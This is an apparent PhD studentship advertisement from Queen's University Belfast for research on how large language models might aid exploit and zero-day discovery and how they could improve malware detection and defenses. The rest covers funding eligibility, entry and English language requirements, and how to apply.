Overview
As generative AI models, particularly large language models (LLMs), continue to advance, their potential applications in cybersecurity have attracted significant attention. These models are capable of both harmful and beneficial applications in cybersecurity, raising important research questions about how such models can be used to improve security postures while mitigating associated risks. In offensive cybersecurity, LLMs can assist attackers by generating exploit code or even zero-day vulnerabilities, a major concern for governments and organizations alike. Conversely, the deep knowledge extraction and hyperdimensional representation capabilities of these models offer promising solutions for malware detection and defense. The dual-use nature of these models necessitates a comprehensive exploration of their cybersecurity applications, focusing on developing effective defenses against model misuse while exploring LLM capabilities for defensive applications. This research aims to bridge the gap between understanding the risks of LLMs in generating offensive tools and harnessing their potential for advanced malware detection.
Research Objectives
Objective 1: Analyze the risks and mechanisms by which code-generating LLMs could generate or support the discovery of zero-day vulnerabilities.
Objective 2: Develop methodologies for extracting cybersecurity-relevant information from code representations within LLMs, focusing on knowledge extraction, feature mapping, and pattern recognition.
Objective 3: Leverage LLMs to enhance malware detection by representing code and malicious activity in a hyperdimensional space, enabling new avenues for identifying and recognizing emerging threats.
Objective 4: Propose defense strategies to mitigate the misuse of generative models in offensive cybersecurity.
Research Questions
How can LLMs be leveraged to autonomously identify and potentially exploit vulnerabilities in code, and what controls are necessary to prevent their misuse?
In what ways can LLMs be trained to accurately represent benign and malicious code in hyperdimensional space for effective malware detection and classification?
What feature extraction techniques are best suited for transforming LLM-based code embeddings into a structured form that aids in defensive applications?
What safeguards can be established to prevent malicious use of these models in generating zero-day vulnerabilities?
Impact and Significance
This research has significant implications for both offensive and defensive cybersecurity. By understanding the offensive potential of generative models, it aims to address critical concerns around LLM misuse in vulnerability discovery. Meanwhile, developing defensive applications could lead to groundbreaking advancements in malware detection, leveraging LLMs to provide security experts with a powerful new tool for recognizing and analyzing malicious patterns. The proposal also addresses the ethical dimensions of AI, contributing to the responsible use of generative models in cybersecurity.
Funding Information
To be eligible for consideration for a Home DfE or EPSRC Studentship (covering tuition fees and maintenance stipend of approx. £19,237 per annum), a candidate must satisfy all the eligibility criteria based on nationality, residency and academic qualifications.
To be classed as a Home student, candidates must meet the following criteria and the associated residency requirements:
• Be a UK National,
or • Have settled status,
or • Have pre-settled status,
or • Have indefinite leave to remain or enter the UK.
Candidates from ROI may also qualify for Home student funding.
Previous PhD study MAY make you ineligible to be considered for funding.
Please note that other terms and conditions also apply.
Please note that any available PhD studentships will be allocated on a competitive basis across a number of projects currently being advertised by the School.
A small number of international awards will be available for allocation across the School. An international award is not guaranteed to be available for this project, and competition across the School for these awards will be highly competitive.
Academic Requirements:
The minimum academic requirement for admission is normally an Upper Second Class Honours degree from a UK or ROI Higher Education provider in a relevant discipline, or an equivalent qualification acceptable to the University.
Entrance requirements
Graduate
The minimum academic requirement for admission to a research degree programme is normally an Upper Second Class Honours degree from a UK or ROI HE provider, or an equivalent qualification acceptable to the University. Further information can be obtained by contacting the School.
International Students
For information on international qualification equivalents, please check the specific information for your country.
English Language Requirements
Evidence of an IELTS* score of 6.0, with not less than 5.5 in any component or equivalent qualification acceptable to the University is required (*taken within the last 2 years).
International students wishing to apply to Queen’s University Belfast (and for whom English is not their first language), must be able to demonstrate their proficiency in English in order to benefit fully from their course of study or research. Non-EEA nationals must also satisfy UK Visas and Immigration (UKVI) immigration requirements for English language for visa purposes.
For more information on English Language requirements for EEA and non-EEA nationals see: www.qub.ac.uk/EnglishLanguageReqs.
If you need to improve your English language skills before you enter this degree programme, INTO Queen’s University Belfast offers a range of English language courses. These intensive and flexible courses are designed to improve your English ability for admission to this degree.
How to Apply
Apply using our online Postgraduate Applications Portal and follow the step-by-step instructions on how to apply.
Find a supervisor
If you’re interested in a particular project, we suggest you contact the relevant academic before you apply, to introduce yourself and ask questions.
To find a potential supervisor aligned with your area of interest, or if you are unsure of who to contact, look through the staff profiles linked here.
You might be asked to provide a short outline of your proposal to help us identify potential supervisors.